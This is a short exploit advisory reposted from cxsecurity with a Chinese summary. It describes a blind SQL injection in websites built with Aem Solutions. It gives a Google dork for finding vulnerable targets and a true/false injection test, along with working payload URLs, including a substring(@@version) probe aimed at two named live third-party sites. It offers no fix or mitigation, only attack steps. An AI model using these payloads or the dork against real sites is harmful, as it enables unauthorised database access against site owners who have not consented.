Aem Solutions - Blind Sql Injection Vulnerability
Aem Solutions存在盲SQL注入漏洞,通过在URL参数中添加"and true"或"and false"可验证漏洞存在,并利用如`substring(@@version,1,1)=5`提取数据库版本信息。该漏洞影响多个网站,并可通过Google Dork "Powered By Aem Solutions"发现目标。 2025-5-8 19:15:44 Author: cxsecurity.com(查看原文) 阅读量:3 收藏

********************************************************* #Exploit Title: Aem Solutions - Blind Sql Injection Vulnerability #Date: 2025-05-07 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered By Aem Solutions" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://www.aaar.co.in/page.php?id=3%27%20and%20true--+ * https://www.aaar.co.in/page.php?id=3%27%20and%20false--+ * https://www.aaar.co.in/page.php?id=3%27%20and%20substring(@@version,1,1)=5--+ ### Demo 2: * https://csalok.com/page.php?id=2%27%20and%20true--+ * https://csalok.com/page.php?id=2%27%20and%20false--+ * https://csalok.com/page.php?id=2%27%20and%20substring(@@version,1,1)=5--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025050019
如有侵权请联系:admin#unsafe.sh